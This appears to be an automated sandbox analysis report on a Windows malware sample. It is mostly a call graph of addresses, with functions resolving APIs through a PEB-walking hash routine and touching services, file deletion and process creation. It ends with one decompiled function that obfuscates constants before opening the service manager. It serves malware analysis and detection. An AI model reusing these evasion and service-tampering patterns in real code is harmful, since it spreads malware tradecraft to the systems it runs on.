20a918 4370->4405 4373 20a8b0 GetPEB 4374 203da2 4373->4374 4409 211f8a 4374->4409 4376 203db4 4376->4055 4378 21dd0c 4377->4378 4379 207ff2 2 API calls 4378->4379 4380 21dd93 4379->4380 4380->4058 4382 2047f3 4381->4382 4383 20a42d GetPEB 4382->4383 4384 20480e 4383->4384 4384->4058 4386 20a8c2 4385->4386 4416 218519 4386->4416 4390 204b74 4389->4390 4397 201ea7 4390->4397 4394 204df6 4393->4394 4395 21aa30 GetPEB 4394->4395 4396 204e69 SHFileOperationW 4395->4396 4396->4366 4398 201ebc 4397->4398 4401 20702c 4398->4401 4402 207049 4401->4402 4403 21aa30 GetPEB 4402->4403 4404 201f4c 4403->4404 4404->4357 4406 20a936 4405->4406 4413 20a42d 4406->4413 4410 211f99 4409->4410 4411 21aa30 GetPEB 4410->4411 4412 211fef DeleteFileW 4411->4412 4412->4376 4414 21aa30 GetPEB 4413->4414 4415 203d95 4414->4415 4415->4373 4417 218529 4416->4417 4418 201db9 GetPEB 4417->4418 4419 2185ed 4418->4419 4422 20a30c 4419->4422 4423 20a326 4422->4423 4424 21aa30 GetPEB 4423->4424 4425 20a392 4424->4425 4425->4058 4427 205dff 4426->4427 4428 21aa30 GetPEB 4427->4428 4429 205e4f SetFileInformationByHandle 4428->4429 4429->4069 4431 209481 4430->4431 4432 21aa30 GetPEB 4431->4432 4433 2094da 4432->4433 4433->4076 4435 210df7 4434->4435 4436 21aa30 GetPEB 4435->4436 4437 210e3f 4436->4437 4437->4076 4439 209595 4438->4439 4440 21aa30 GetPEB 4439->4440 4441 2095ff 4440->4441 4441->4085 4443 20d70e 4442->4443 4444 218519 GetPEB 4443->4444 4445 20df52 4443->4445 4448 20df63 4443->4448 4451 207ff2 RtlAllocateHeap GetPEB 4443->4451 4453 218f9e 2 API calls 4443->4453 4463 2042c4 4443->4463 4467 212007 4443->4467 4471 2116af 4443->4471 4475 21d25e 4443->4475 4478 20df6f 4443->4478 4444->4443 4446 218519 GetPEB 4445->4446 4446->4448 4448->4091 4451->4443 4453->4443 4456 201d2d 4455->4456 4457 21aa30 GetPEB 4456->4457 4458 201d93 4457->4458 4458->4091 4460 211680 4459->4460 4461 20a42d GetPEB 4460->4461 4462 2116a7 4461->4462 4462->4091 4464 2042e2 4463->4464 4465 21aa30 GetPEB 4464->4465 4466 204335 OpenServiceW 4465->4466 4466->4443 4468 212033 4467->4468 4469 21aa30 GetPEB 4468->4469 4470 21209a 4469->4470 4470->4443 4472 2116f3 4471->4472 4473 21aa30 GetPEB 4472->4473 4474 21174d 4473->4474 4474->4443 4476 21aa30 GetPEB 4475->4476 4477 21d2c5 4476->4477 4477->4443 4479 20df8a 4478->4479 4480 21aa30 GetPEB 4479->4480 4481 20dfe1 4480->4481 4481->4443 4483 20ee1a 4482->4483 4484 21aa30 GetPEB 4483->4484 4485 20ee76 4484->4485 4485->4100 4487 21ab70 4486->4487 4488 21aa30 GetPEB 4487->4488 4489 21abc6 4488->4489 4489->4100 4494 21a8cb 4490->4494 4492 21dcf7 2 API calls 4492->4494 4493 20a42d GetPEB 4493->4494 4494->4492 4494->4493 4495 21aa14 4494->4495 4496 21aa12 4494->4496 4498 207ff2 2 API calls 4494->4498 4499 20a8b0 GetPEB 4494->4499 4556 204816 4494->4556 4497 218519 GetPEB 4495->4497 4496->4111 4497->4496 4498->4494 4499->4494 4515 21fc7c 4500->4515 4501 21ffc3 4502 218606 2 API calls 4501->4502 4503 21ffe0 4502->4503 4579 207f1d 4503->4579 4504 207ff2 RtlAllocateHeap GetPEB 4504->4515 4506 22003a 4510 218519 GetPEB 4506->4510 4507 21dcf7 2 API calls 4507->4515 4514 21ffb1 4510->4514 4511 20a8b0 GetPEB 4511->4514 4513 20a42d GetPEB 4513->4515 4514->4111 4515->4501 4515->4504 4515->4506 4515->4507 4515->4513 4515->4514 4517 20a8b0 GetPEB 4515->4517 4567 218606 4515->4567 4571 21c0c1 4515->4571 4575 20ed7e 4515->4575 4517->4515 4529 20cf7e 4518->4529 4519 218519 GetPEB 4519->4529 4523 20d58f 4526 218519 GetPEB 4523->4526 4525 207ff2 2 API calls 4525->4529 4527 20d5a6 4526->4527 4527->4111 4528 20ed7e GetPEB 4528->4529 4529->4519 4529->4523 4529->4525 4529->4527 4529->4528 4587 207735 4529->4587 4594 207e87 4529->4594 4598 21ae6d 4529->4598 4613 2070b3 4529->4613 4537 205577 4530->4537 4532 205969 4534 218519 GetPEB 4532->4534 4533 205967 4533->4111 4534->4533 4535 207ff2 2 API calls 4535->4537 4537->4532 4537->4533 4537->4535 4538 20ed7e GetPEB 4537->4538 4644 205e60 4537->4644 4650 20aefb 4537->4650 4538->4537 4555 21e406 4539->4555 4540 21f410 4692 202b62 4540->4692 4542 21dcf7 2 API calls 4542->4555 4543 21f426 4543->4111 4548 20a8b0 GetPEB 4548->4555 4550 202b62 GetPEB 4550->4555 4551 218519 GetPEB 4551->4555 4553 209670 GetPEB 4553->4555 4555->4540 4555->4542 4555->4543 4555->4548 4555->4550 4555->4551 4555->4553 4660 21dac6 4555->4660 4664 2088c3 4555->4664 4668 2075fa 4555->4668 4672 21408e 4555->4672 4676 202ae4 4555->4676 4680 2209b5 4555->4680 4683 21a2e8 4555->4683 4558 204836 4556->4558 4559 204b23 4558->4559 4561 207ff2 2 API calls 4558->4561 4562 204b21 4558->4562 4563 21847f 4558->4563 4560 21847f GetPEB 4559->4560 4560->4562 4561->4558 4562->4494 4564 2184a6 4563->4564 4565 21aa30 GetPEB 4564->4565 4566 218502 4565->4566 4566->4558 4568 21861f 4567->4568 4569 207ff2 2 API calls 4568->4569 4570 2186bc 4569->4570 4570->4515 4570->4570 4572 21c0e6 4571->4572 4573 20a42d GetPEB 4572->4573 4574 21c108 4573->4574 4574->4515 4576 20ed97 4575->4576 4583 217a71 4576->4583 4580 207f39 4579->4580 4581 20a42d GetPEB 4580->4581 4582 207f55 4581->4582 4582->4511 4584 217a8a 4583->4584 4585 21aa30 GetPEB 4584->4585 4586 20ee00 4585->4586 4586->4515 4589 207764 4587->4589 4588 207ff2 2 API calls 4588->4589 4589->4588 4590 207a10 4589->4590 4591 2079f3 4589->4591 4592 220e3a GetPEB 4589->4592 4590->4529 4620 220e3a 4591->4620 4592->4589 4595 207e9a 4594->4595 4596 20ed7e GetPEB 4595->4596 4597 207f16 4596->4597 4597->4529 4612 21aea5 4598->4612 4601 21baf7 4602 20957d GetPEB 4601->4602 4605 21baf5 4602->4605 4603 207ff2 2 API calls 4603->4612 4605->4529 4607 21dcf7 RtlAllocateHeap GetPEB 4607->4612 4608 209462 GetPEB 4608->4612 4609 218519 GetPEB 4609->4612 4611 20a8b0 GetPEB 4611->4612 4612->4601 4612->4603 4612->4605 4612->4607 4612->4608 4612->4609 4612->4611 4624 220b68 4612->4624 4628 217b05 4612->4628 4632 216bc6 4612->4632 4636 20a81d 4612->4636 4640 21828a 4612->4640 4616 2070dc 4613->4616 4614 2074bb 4614->4529 4615 215b3b GetPEB 4615->4616 4616->4614 4616->4615 4617 207ff2 2 API calls 4616->4617 4618 2074a7 4616->4618 4617->4616 4619 218519 GetPEB 4618->4619 4619->4614 4621 220e58 4620->4621 4622 20ed7e GetPEB 4621->4622 4623 220f24 4622->4623 4623->4590 4625 220b97 4624->4625 4626 21aa30 GetPEB 4625->4626 4627 220bfc 4626->4627 4627->4612 4629 217b37 4628->4629 4630 21aa30 GetPEB 4629->4630 4631 217b8a 4630->4631 4631->4612 4633 216bda 4632->4633 4634 21aa30 GetPEB 4633->4634 4635 216c3d 4634->4635 4635->4612 4637 20a83f 4636->4637 4638 21aa30 GetPEB 4637->4638 4639 20a89d 4638->4639 4639->4612 4641 2182a9 4640->4641 4642 21aa30 GetPEB 4641->4642 4643 218300 4642->4643 4643->4612 4646 205e82 4644->4646 4645 218519 GetPEB 4645->4646 4646->4645 4647 2064bd 4646->4647 4648 207ff2 2 API calls 4646->4648 4649 20ca90 GetPEB 4646->4649 4647->4537 4648->4646 4649->4646 4652 20af1c 4650->4652 4651 21ae6d 2 API calls 4651->4652 4652->4651 4653 20b0b3 4652->4653 4654 20b0e8 4652->4654 4656 21e274 4653->4656 4654->4537 4657 21e2a0 4656->4657 4658 21aa30 GetPEB 4657->4658 4659 21e312 4658->4659 4659->4654 4661 21dae5 4660->4661 4662 21aa30 GetPEB 4661->4662 4663 21db32 4662->4663 4663->4555 4665 2088f5 4664->4665 4666 21aa30 GetPEB 4665->4666 4667 208950 4666->4667 4667->4555 4669 20762c 4668->4669 4670 21aa30 GetPEB 4669->4670 4671 207690 4670->4671 4671->4555 4673 2140b3 4672->4673 4674 21aa30 GetPEB 4673->4674 4675 214103 4674->4675 4675->4555 4677 202b04 4676->4677 4678 21aa30 GetPEB 4677->4678 4679 202b4b 4678->4679 4679->4555 4696 2094ee 4680->4696 4689 21a519 4683->4689 4684 207ff2 RtlAllocateHeap GetPEB 4684->4689 4686 21a634 4687 21a64a 4686->4687 4688 218519 GetPEB 4686->4688 4687->4555 4688->4687 4689->4684 4689->4686 4690 20ed7e GetPEB 4689->4690 4691 218519 GetPEB 4689->4691 4700 21c032 4689->4700 4690->4689 4691->4689 4693 202b77 4692->4693 4694 21aa30 GetPEB 4693->4694 4695 202bce 4694->4695 4695->4543 4697 209511 4696->4697 4698 21aa30 GetPEB 4697->4698 4699 209566 4698->4699 4699->4555 4701 21c054 4700->4701 4702 21aa30 GetPEB 4701->4702 4703 21c0ae 4702->4703 4703->4689 4705 20e262 4704->4705 4706 21aa30 GetPEB 4705->4706 4707 20e2c1 4706->4707 4707->4118 4709 209623 4708->4709 4726 218315 4709->4726 4714 2211d1 4712->4714 4713 21dcf7 2 API calls 4713->4714 4714->4713 4715 211652 GetPEB 4714->4715 4716 207ff2 2 API calls 4714->4716 4717 221380 4714->4717 4718 20a8b0 GetPEB 4714->4718 4720 221391 4714->4720 4813 217ba6 4714->4813 4715->4714 4716->4714 4721 218519 GetPEB 4717->4721 4718->4714 4720->4128 4721->4720 4723 2092c1 4722->4723 4724 2092ac 4722->4724 4723->4128 4724->4723 4725 218519 GetPEB 4724->4725 4725->4724 4730 21832d 4726->4730 4728 21845c 4731 218519 GetPEB 4728->4731 4730->4728 4732 20966a 4730->4732 4733 207ff2 2 API calls 4730->4733 4735 20bb7e 4730->4735 4752 204bc7 4730->4752 4757 21907f 4730->4757 4731->4732 4732->4128 4733->4730 4741 20c63d 4735->4741 4739 20ca5b 4742 20957d GetPEB 4739->4742 4740 20a958 GetPEB 4740->4741 4741->4739 4741->4740 4743 21dcf7 RtlAllocateHeap GetPEB 4741->4743 4744 20ca59 4741->4744 4747 209462 GetPEB 4741->4747 4750 20ed7e GetPEB 4741->4750 4751 20a8b0 GetPEB 4741->4751 4766 20aa4d 4741->4766 4770 20b144 4741->4770 4774 201c45 4741->4774 4778 214624 4741->4778 4782 2092c7 4741->4782 4786 21ca69 4741->4786 4790 202bd9 4741->4790 4742->4744 4743->4741 4744->4730 4747->4741 4750->4741 4751->4741 4753 21ca69 GetPEB 4752->4753 4754 204c44 4753->4754 4755 218519 GetPEB 4754->4755 4756 204c57 4755->4756 4756->4730 4764 21947b 4757->4764 4758 2195cb 4759 20957d GetPEB 4758->4759 4761 2195c9 4759->4761 4760 20aa4d GetPEB 4760->4764 4761->4730 4762 21dcf7 RtlAllocateHeap GetPEB 4762->4764 4763 209462 GetPEB 4763->4764 4764->4758 4764->4760 4764->4761 4764->4762 4764->4763 4765 20a8b0 GetPEB 4764->4765 4765->4764 4767 20aa76 4766->4767 4768 21aa30 GetPEB 4767->4768 4769 20aab9 4768->4769 4769->4741 4771 20b15f 4770->4771 4772 21aa30 GetPEB 4771->4772 4773 20b1b8 4772->4773 4773->4741 4775 201c76 4774->4775 4776 21aa30 GetPEB 4775->4776 4777 201cd0 4776->4777 4777->4741 4779 214646 4778->4779 4780 21aa30 GetPEB 4779->4780 4781 2146a8 4780->4781 4781->4741 4783 2092e5 4782->4783 4784 21aa30 GetPEB 4783->4784 4785 20933c 4784->4785 4785->4741 4787 21ca7b 4786->4787 4788 21aa30 GetPEB 4787->4788 4789 21cad4 4788->4789 4789->4741 4793 203757 4790->4793 4791 218519 GetPEB 4791->4793 4792 203a7d 4795 20957d GetPEB 4792->4795 4793->4791 4793->4792 4794 207ff2 2 API calls 4793->4794 4796 203bbb 4793->4796 4798 209462 GetPEB 4793->4798 4799 21dcf7 RtlAllocateHeap GetPEB 4793->4799 4800 20cb52 GetPEB 4793->4800 4803 220b68 GetPEB 4793->4803 4804 20a8b0 GetPEB 4793->4804 4805 21d84c 4793->4805 4809 208d13 4793->4809 4794->4793 4797 203aa2 4795->4797 4796->4796 4797->4741 4798->4793 4799->4793 4800->4793 4803->4793 4804->4793 4806 21d87f 4805->4806 4807 21aa30 GetPEB 4806->4807 4808 21d8ca 4807->4808 4808->4793 4810 208d41 4809->4810 4811 21aa30 GetPEB 4810->4811 4812 208da7 4811->4812 4812->4793 4814 217bbf 4813->4814 4815 207ff2 2 API calls 4814->4815 4816 217c88 4815->4816 4816->4714 4816->4816 4818 20f02e 4817->4818 4819 21aa30 GetPEB 4818->4819 4820 20f082 4819->4820 4820->4138 4822 20ab09 4821->4822 4823 21aa30 GetPEB 4822->4823 4824 20ab6d 4823->4824 4824->4138 4826 201fe3 4825->4826 4827 21aa30 GetPEB 4826->4827 4828 202045 4827->4828 4828->4138 4830 21aa30 GetPEB 4829->4830 4831 215cbb 4830->4831 4831->4152 4833 214567 4832->4833 4834 20a42d GetPEB 4833->4834 4835 214587 4834->4835 4835->4152 4841 210d2c 4836->4841 4837 210da3 4837->4163 4838 208dc4 GetPEB 4838->4841 4839 218519 GetPEB 4839->4841 4841->4837 4841->4838 4841->4839 4842 211e67 2 API calls 4841->4842 4936 219e56 4841->4936 4842->4841 4853 21144a 4843->4853 4844 2146bb 2 API calls 4844->4853 4845 211647 4845->4163 4846 21da22 GetPEB 4846->4853 4849 20a8b0 GetPEB 4849->4853 4850 21dcf7 RtlAllocateHeap GetPEB 4850->4853 4852 2047ce GetPEB 4852->4853 4853->4844 4853->4845 4853->4846 4853->4849 4853->4850 4853->4852 4944 20b6cf 4853->4944 4948 208969 4853->4948 4952 20ea99 4853->4952 4959 20ab87 4853->4959 4856 217703 4855->4856 4858 21d2ce GetPEB 4856->4858 4861 217759 4856->4861 4862 21da22 GetPEB 4856->4862 4864 211e67 CloseHandle GetPEB 4856->4864 4865 2177d7 4856->4865 4867 20b6cf GetPEB 4856->4867 4869 208969 GetPEB 4856->4869 4871 21dcf7 2 API calls 4856->4871 4873 2047ce GetPEB 4856->4873 4874 20a8b0 GetPEB 4856->4874 4875 20ea99 3 API calls 4856->4875 4977 21bb23 4856->4977 4984 203de2 4856->4984 4987 21d389 4856->4987 4858->4856 4863 20ab87 3 API calls 4861->4863 4862->4856 4866 217789 4863->4866 4864->4856 4865->4163 4866->4865 4868 211e67 2 API calls 4866->4868 4867->4856 4870 2177b2 4868->4870 4869->4856 4872 211e67 2 API calls 4870->4872 4871->4856 4872->4865 4873->4856 4874->4856 4875->4856 5017 217cdb 4876->5017 4878 21570e 4879 20ab87 3 API calls 4878->4879 4880 218519 GetPEB 4878->4880 4881 215b08 4878->4881 4882 204816 2 API calls 4878->4882 4883 2146bb 2 API calls 4878->4883 4885 215b06 4878->4885 4886 21da22 GetPEB 4878->4886 4888 20cb52 GetPEB 4878->4888 4889 20b6cf GetPEB 4878->4889 4890 21dcf7 RtlAllocateHeap GetPEB 4878->4890 4892 208969 GetPEB 4878->4892 4893 21453f GetPEB 4878->4893 4894 20a8b0 GetPEB 4878->4894 4895 2047ce GetPEB 4878->4895 4896 20ea99 3 API calls 4878->4896 5020 21dedc 4878->5020 5026 218727 4878->5026 4879->4878 4880->4878 4884 211e67 2 API calls 4881->4884 4882->4878 4883->4878 4884->4885 4885->4163 4886->4878 4888->4878 4889->4878 4890->4878 4892->4878 4893->4878 4894->4878 4895->4878 4896->4878 4907 20f696 4897->4907 4898 2146bb 2 API calls 4898->4907 4899 20f88f 4899->4163 4900 21da22 GetPEB 4900->4907 4901 20b6cf GetPEB 4901->4907 4902 20a8b0 GetPEB 4902->4907 4903 208969 GetPEB 4903->4907 4904 20ab87 3 API calls 4904->4907 4905 21dcf7 RtlAllocateHeap GetPEB 4905->4907 4906 2047ce GetPEB 4906->4907 4907->4898 4907->4899 4907->4900 4907->4901 4907->4902 4907->4903 4907->4904 4907->4905 4907->4906 4908 20ea99 3 API calls 4907->4908 4908->4907 4910 209a55 4909->4910 4911 209b65 4910->4911 4915 209b63 4910->4915 5030 2046be 4910->5030 5034 21c3a0 4910->5034 5042 207c37 4910->5042 4913 219e56 GetPEB 4911->4913 4913->4915 4915->4163 4923 211c8c 4917->4923 4918 20ab87 3 API calls 4918->4923 4919 21da22 GetPEB 4919->4923 4920 211dd2 4920->4163 4921 20b6cf GetPEB 4921->4923 4922 208969 GetPEB 4922->4923 4923->4918 4923->4919 4923->4920 4923->4921 4923->4922 4924 21dcf7 2 API calls 4923->4924 4925 2047ce GetPEB 4923->4925 4926 20a8b0 GetPEB 4923->4926 4927 20ea99 3 API calls 4923->4927 4924->4923 4925->4923 4926->4923 4927->4923 4934 20ba53 4928->4934 4929 20bb5e 4929->4163 4930 21c3a0 GetPEB 4930->4934 4931 20bb60 4932 219e56 GetPEB 4931->4932 4932->4929 4933 2046be GetPEB 4933->4934 4934->4929 4934->4930 4934->4931 4934->4933 4935 207c37 GetPEB 4934->4935 4935->4934 4937 219e69 4936->4937 4940 206bf2 4937->4940 4941 206c0c 4940->4941 4942 21aa30 GetPEB 4941->4942 4943 206c8f 4942->4943 4943->4841 4945 20b6e5 4944->4945 4946 21aa30 GetPEB 4945->4946 4947 20b742 4946->4947 4947->4853 4949 208980 4948->4949 4950 21d25e GetPEB 4949->4950 4951 208a5d 4950->4951 4951->4853 4953 20eab9 4952->4953 4954 20ecec 4953->4954 4955 208f65 2 API calls 4953->4955 4956 20ecd6 4953->4956 4969 2019b8 4953->4969 4954->4853 4955->4953 4958 211e67 2 API calls 4956->4958 4958->4954 4960 20abb0 4959->4960 4961 204b61 GetPEB 4960->4961 4962 20ad67 4961->4962 4973 207f5d 4962->4973 4964 20ad99 4965 211e67 2 API calls 4964->4965 4968 20ada4 4964->4968 4966 20adc4 4965->4966 4967 211e67 2 API calls 4966->4967 4967->4968 4968->4853 4970 2019dd 4969->4970 4971 21aa30 GetPEB 4970->4971 4972 201a3f 4971->4972 4972->4953 4974 207f8e 4973->4974 4975 21aa30 GetPEB 4974->4975 4976 207fd4 CreateProcessW 4975->4976 4976->4964 4978 21bb48 4977->4978 4979 211e67 2 API calls 4978->4979 4982 21be1d 4978->4982 4983 203de2 GetPEB 4978->4983 4997 220ac8 4978->4997 5001 21d8ec 4978->5001 4979->4978 4982->4856 4983->4978 4985 21aa30 GetPEB 4984->4985 4986 203e36 4985->4986 4986->4856 4989 21d3c3 4987->4989 4990 21d82d 4989->4990 4992 21d82b 4989->4992 4993 204b61 GetPEB 4989->4993 4994 21dcf7 2 API calls 4989->4994 4996 20a8b0 GetPEB 4989->4996 5005 21de10 4989->5005 5009 204241 4989->5009 5013 219008 4990->5013 4992->4856 4993->4989 4994->4989 4996->4989 4998 220af2 4997->4998 4999 21aa30 GetPEB 4998->4999 5000 220b4e 4999->5000 5000->4978 5002 21d8ff 5001->5002 5003 21aa30 GetPEB 5002->5003 5004 21d96e 5003->5004 5004->4978 5006 21de56 5005->5006 5007 21aa30 GetPEB 5006->5007 5008 21deba 5007->5008 5008->4989 5010 204257 5009->5010 5011 21aa30 GetPEB 5010->5011 5012 2042b3 5011->5012 5012->4989 5014 21901a 5013->5014 5015 21aa30 GetPEB 5014->5015 5016 219074 5015->5016 5016->4992 5018 21aa30 GetPEB 5017->5018 5019 217d3e 5018->5019 5019->4878 5021 21df09 5020->5021 5022 21e1a5 5021->5022 5023 21e1a3 5021->5023 5025 207ff2 2 API calls 5021->5025 5024 220e3a GetPEB 5022->5024 5023->4878 5024->5023 5025->5021 5027 218758 5026->5027 5028 21aa30 GetPEB 5027->5028 5029 2187b7 5028->5029 5029->4878 5031 2046e5 5030->5031 5032 21aa30 GetPEB 5031->5032 5033 204737 5032->5033 5033->4910 5035 21c3bc 5034->5035 5036 21c627 5035->5036 5047 20a3a3 5035->5047 5036->4910 5039 20ed7e GetPEB 5040 21c5e2 5039->5040 5040->5036 5041 20ed7e GetPEB 5040->5041 5041->5040 5045 207c52 5042->5045 5043 207df1 5043->4910 5044 21cadf GetPEB 5044->5045 5045->5043 5045->5044 5051 206ca0 5045->5051 5048 20a3c0 5047->5048 5049 21aa30 GetPEB 5048->5049 5050 20a41a 5049->5050 5050->5036 5050->5039 5052 206cb8 5051->5052 5053 21aa30 GetPEB 5052->5053 5054 206d15 5053->5054 5054->5045 5056 21aa30 GetPEB 5055->5056 5057 20f8f4 5056->5057 5057->4181 5059 20a9e6 5058->5059 5060 21aa30 GetPEB 5059->5060 5061 20aa3f 5060->5061 5061->4181 5063 208ee7 5062->5063 5064 21aa30 GetPEB 5063->5064 5065 208f54 5064->5065 5065->4181 5068 20435e 5066->5068 5067 207ff2 2 API calls 5067->5068 5068->5067 5069 20ae64 GetPEB 5068->5069 5070 20457c 5068->5070 5071 2045a6 5068->5071 5069->5068 5077 20ae64 5070->5077 5071->4181 5074 204e8f 5073->5074 5075 21aa30 GetPEB 5074->5075 5076 204ed7 5075->5076 5076->4181 5078 20ae8b 5077->5078 5079 21aa30 GetPEB 5078->5079 5080 20aee2 5079->5080 5080->5071 5083 21001b 5081->5083 5082 218606 2 API calls 5082->5083 5083->5082 5086 21031b 5083->5086 5088 20a8b0 GetPEB 5083->5088 5089 20cd29 5083->5089 5093 20ee81 5083->5093 5098 202206 5083->5098 5086->4188 5088->5083 5090 20cd3f 5089->5090 5091 21aa30 GetPEB 5090->5091 5092 20cd9f 5091->5092 5092->5083 5102 218f15 5093->5102 5097 20eff7 5097->5083 5099 20222a 5098->5099 5100 20a42d GetPEB 5099->5100 5101 202249 5100->5101 5101->5083 5103 218f34 5102->5103 5104 21aa30 GetPEB 5103->5104 5105 20efa8 5104->5105 5105->5097 5106 21db43 5105->5106 5107 21db6c 5106->5107 5108 21aa30 GetPEB 5107->5108 5109 21dbd4 5108->5109 5109->5097 5111 207b13 5110->5111 5112 21aa30 GetPEB 5111->5112 5113 207b7c 5112->5113 5113->4196 5115 218b6f 5114->5115 5116 21aa30 GetPEB 5115->5116 5117 218bd5 5116->5117 5117->3997 5119 209df5 5118->5119 5121 20a305 5119->5121 5123 21dcf7 RtlAllocateHeap GetPEB 5119->5123 5124 20a918 GetPEB 5119->5124 5126 2047ce GetPEB 5119->5126 5127 20a8b0 GetPEB 5119->5127 5128 209dcf 2 API calls 5119->5128 5129 204635 5119->5129 5133 207e00 5119->5133 5137 208abf 5119->5137 5121->4217 5123->5119 5124->5119 5126->5119 5127->5119 5128->5119 5130 20464b 5129->5130 5131 21aa30 GetPEB 5130->5131 5132 2046b0 5131->5132 5132->5119 5134 207e18 5133->5134 5135 21aa30 GetPEB 5134->5135 5136 207e79 5135->5136 5136->5119 5138 208ad1 5137->5138 5139 21aa30 GetPEB 5138->5139 5140 208b32 5139->5140 5140->5119 5152 20e2cc 5141->5152 5145 209ba6 5144->5145 5175 2091dd 5145->5175 5150 211e67 2 API calls 5151 209d26 5150->5151 5151->4226 5155 20e2f1 5152->5155 5157 20e4ef 5155->5157 5159 205357 5155->5159 5161 205988 5155->5161 5164 208e4d 5155->5164 5167 21c15d 5155->5167 5171 202a58 5155->5171 5160 211e67 2 API calls 5157->5160 5159->4226 5160->5159 5162 21aa30 GetPEB 5161->5162 5163 2059db 5162->5163 5163->5155 5165 215c73 GetPEB 5164->5165 5166 208eb3 5165->5166 5166->5155 5168 21c176 5167->5168 5169 21aa30 GetPEB 5168->5169 5170 21c1de 5169->5170 5170->5155 5172 202a71 5171->5172 5173 21aa30 GetPEB 5172->5173 5174 202ad6 5173->5174 5174->5155 5176 21aa30 GetPEB 5175->5176 5177 20923b 5176->5177 5177->5151 5178 2076aa 5177->5178 5179 2076cd 5178->5179 5180 21aa30 GetPEB 5179->5180 5181 207723 5180->5181 5181->5150 5183 21e365 5182->5183 5184 20a42d GetPEB 5183->5184 5185 21e38d 5184->5185 5185->4236 5191 20410d 5186->5191 5188 20421e 5190 201fd1 GetPEB 5188->5190 5189 21dcf7 2 API calls 5189->5191 5192 20421c 5190->5192 5191->5188 5191->5189 5191->5192 5193 20aad6 GetPEB 5191->5193 5194 20a8b0 GetPEB 5191->5194 5206 201f53 5191->5206 5192->4247 5193->5191 5194->5191 5197 216c65 5195->5197 5196 204b61 GetPEB 5196->5197 5197->5196 5198 216d92 5197->5198 5200 216db0 5197->5200 5214 209d31 5197->5214 5210 216637 5198->5210 5200->4247 5203 20b1db 5202->5203 5204 21aa30 GetPEB 5203->5204 5205 20b231 5204->5205 5205->4259 5207 201f6f 5206->5207 5208 21aa30 GetPEB 5207->5208 5209 201fc3 5208->5209 5209->5191 5211 216659 5210->5211 5212 21aa30 GetPEB 5211->5212 5213 2166b7 5212->5213 5213->5200 5215 209d52 5214->5215 5216 21aa30 GetPEB 5215->5216 5217 209dc1 5216->5217 5217->5197 5218 20e991 5219 20ea8d 5218->5219 5220 20ea62 5218->5220 5224 20f8fd 5220->5224 5223 2093ed 2 API calls 5223->5219 5235 20fde0 5224->5235 5225 20ffd1 5227 20ab87 3 API calls 5225->5227 5226 204b61 GetPEB 5226->5235 5228 20ea75 5227->5228 5228->5219 5228->5223 5229 20f899 GetPEB 5229->5235 5230 2146bb 2 API calls 5230->5235 5231 21da22 GetPEB 5231->5235 5233 21dcf7 RtlAllocateHeap GetPEB 5233->5235 5234 20a8b0 GetPEB 5234->5235 5235->5225 5235->5226 5235->5228 5235->5229 5235->5230 5235->5231 5235->5233 5235->5234 5236 2047ce GetPEB 5235->5236 5237 20b23c 5235->5237 5236->5235 5238 20b254 5237->5238 5239 21aa30 GetPEB 5238->5239 5240 20b2b8 lstrcmpiW 5239->5240 5240->5235 5241 204ee3 5242 20b6cf GetPEB 5241->5242 5243 205133 5242->5243 5244 20b23c 2 API calls 5243->5244 5245 20514c 5244->5245 5246 21dcf7 2 API calls 5245->5246 5253 2051ad 5245->5253 5247 205167 5246->5247 5248 2047ce GetPEB 5247->5248 5249 20518e 5248->5249 5250 20a8b0 GetPEB 5249->5250 5251 20519b 5250->5251 5252 211f8a 2 API calls 5251->5252 5252->5253 5275 201993 5276 2019dd 5275->5276 5277 21aa30 GetPEB 5276->5277 5278 201a3f 5277->5278 5254 2081b7 5264 208679 5254->5264 5255 218519 GetPEB 5255->5264 5257 208f65 2 API calls 5257->5264 5258 21da22 GetPEB 5258->5264 5259 207ff2 2 API calls 5259->5264 5260 2086e2 5261 20b6cf GetPEB 5261->5264 5262 2086c6 5266 211e67 2 API calls 5262->5266 5263 20b23c 2 API calls 5263->5264 5264->5255 5264->5257 5264->5258 5264->5259 5264->5260 5264->5261 5264->5262 5264->5263 5267 21c264 5264->5267 5271 21458f 5264->5271 5266->5260 5268 21c291 5267->5268 5269 21aa30 GetPEB 5268->5269 5270 21c2dd 5269->5270 5270->5264 5272 2145a2 5271->5272 5273 21aa30 GetPEB 5272->5273 5274 214619 5273->5274 5274->5264 5279 210a96 5281 210aa6 5279->5281 5282 214087 GetPEB 5279->5282 5282->5281 5283 204c5d 5284 204d8d 5283->5284 5285 218606 2 API calls 5284->5285 5290 204dd2 5284->5290 5286 204da8 5285->5286 5291 20cbdf 5286->5291 5289 20a8b0 GetPEB 5289->5290 5293 20cbfb 5291->5293 5292 204dbc 5292->5289 5293->5292 5295 214011 5293->5295 5296 214026 5295->5296 5297 21aa30 GetPEB 5296->5297 5298 214078 5297->5298 5298->5293

                                                                                                                                    Executed Functions

                                                                                                                                    Function 0020912C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 250 20912c-2091af call 2120b9 call 21aa30 OpenSCManagerW
                                                                                                                                    C-Code - Quality: 54%
                                                                                                                                    			E0020912C(int __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				void* _t32;
				signed int _t34;
				int _t43;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t43 = __ecx;
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(0);
				_push(__ecx);
				E002120B9(_t24);
				_v12 = 0x4657ea;
				_t34 = 0x1b;
				_v12 = _v12 / _t34;
				_v12 = _v12 ^ 0x000ac4f3;
				_v8 = 0xb5c996;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x19;
				_v8 = _v8 + 0x3329;
				_v8 = _v8 ^ 0x01161fa0;
				E0021AA30(0x14e, 0x20a9b263, _t34, 0x18e12c58);
				_t32 = OpenSCManagerW(0, 0, _t43); // executed
				return _t32;
			}









                                                                                                                                    0x0020912f
                                                                                                                                    0x00209130
                                                                                                                                    0x00209133
                                                                                                                                    0x00209138
                                                                                                                                    0x0020913a
                                                                                                                                    0x0020913d
                                                                                                                                    0x0020913e
                                                                                                                                    0x00209141
                                                                                                                                    0x00209143
                                                                                                                                    0x00209144
                                                                                                                                    0x00209149
                                                                                                                                    0x0020915a
                                                                                                                                    0x00209162
                                                                                                                                    0x0020916a
                                                                                                                                    0x00209171
                                                                                                                                    0x00209178
                                                                                                                                    0x00209186
                                                                                                                                    0x00209189
                                                                                                                                    0x00209190
                                                                                                                                    0x0020919d
